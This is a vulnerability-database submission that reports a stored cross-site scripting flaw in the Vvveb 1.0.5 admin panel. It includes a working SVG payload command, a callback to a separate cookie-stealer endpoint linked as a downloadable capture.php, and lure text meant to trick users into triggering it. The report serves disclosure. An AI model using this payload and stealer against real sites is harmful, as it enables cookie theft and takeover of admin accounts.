Submit #628297: Vvveb 1.0.5 Cross Site Scriptinginfo

TitleVvveb 1.0.5 Cross Site Scripting
DescriptionDescription The endpoint at [/vadmin123/index.php?module=content/post&type=post] and [/vadmin123/index.php?module=content/posts&type=page] is vulnerable to XSS, an attacker can trigger XSS by uploading malicious SVG image payload as “Featured Media”. The payload can be triggered by opening the image in a new tab, this requires user interaction but the payload is executed without alarming the user. Both endpoints are accessible by an editor and can be used to inject malicious XSS to steal cookies of users, other site admins, editors or even super admins. Reproduce To reproduce the issue, navigate to any of these endpoints to view posts or pages: http://127.0.0.1/vadmin123/index.php?module=content/posts&type=post http://127.0.0.1/vadmin123/index.php?module=content/posts&type=page Edit a post or a page (both are very similar): http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=14&type=page On the right sidebar, click on “Featured Media” to upload a new image. Create the following SVG image: echo '<svg xmlns="http://www.w3.org/2000/svg" width="300" height="300"><rect width="300" height="300" fill="red" /><text x="150" y="250" font-size="12" fill="white" text-anchor="middle" alignment-baseline="middle">Please open the image in a new tab to see it</text><image href="http://127.0.0.1:1718/capture.php" width="300" height="200" /></svg>' > payload.svg Upload payload.svg and save the post. To trigger XSS, open image using its full path: http://127.0.0.1/media/payload.svg When you open it, a request is sent to the following URL: http://127.0.0.1:1718/capture.php capture.php is a cookie stealer that steals cookies of logged-in users. You can download this PHP file from here: https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd Save it as capture.php and start a PHP server to serve it: php -S x.x.x.x:1718 Additionally, SVG images can be configured to show a specific text such as: “Open this image in a new tab” Which can lure users into opening image in a new tab and triggering XSS.
Source⚠️ https://hkohi.ca/vulnerability/7
User
 0xHamy (UID 88518)
Submission08/04/2025 18:43 (11 months ago)
Moderation08/13/2025 18:34 (9 days later)
StatusAccepted
VulDB entry319972 [givanz Vvveb up to 1.0.5 Endpoint post&type=post cross site scripting]
Points19

PreviousOverviewNext

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!